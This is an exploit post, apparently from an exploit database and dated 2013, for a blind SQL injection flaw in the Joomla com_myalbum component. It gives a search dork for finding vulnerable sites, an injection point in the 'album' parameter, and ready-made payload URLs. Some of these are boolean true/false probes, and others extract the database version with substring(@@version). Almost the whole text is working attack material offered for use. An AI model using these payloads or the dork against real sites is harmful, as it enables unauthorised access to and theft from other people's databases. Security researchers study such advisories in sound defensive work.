Joomla Component com_myalbum Blind Injection Vulnerability


Joomla Component com_myalbum Blind Injection Vulnerability
==============================================================
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork : inurl:"com_myalbum"
.:. Script : http://joomlacode.org/gf/project/myalbum/
==============================================================
===[ Exploit ]===

Blind Injection:
================

www.site.com/index.php?option=com_myalbum&album=1[injection]

www.site.com/index.php?option=com_myalbum&album=1+and+1=1 >>> True
www.site.com/index.php?option=com_myalbum&album=1+and+1=2 >>> False


www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=5 >>> True
www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=4 >>> False

####################################################################

# 35CFD470A45CCA31 1337day.com [2013-05-13] C74191FB42EC00C6 #

2 Responses to "Joomla Component com_myalbum Blind Injection Vulnerability"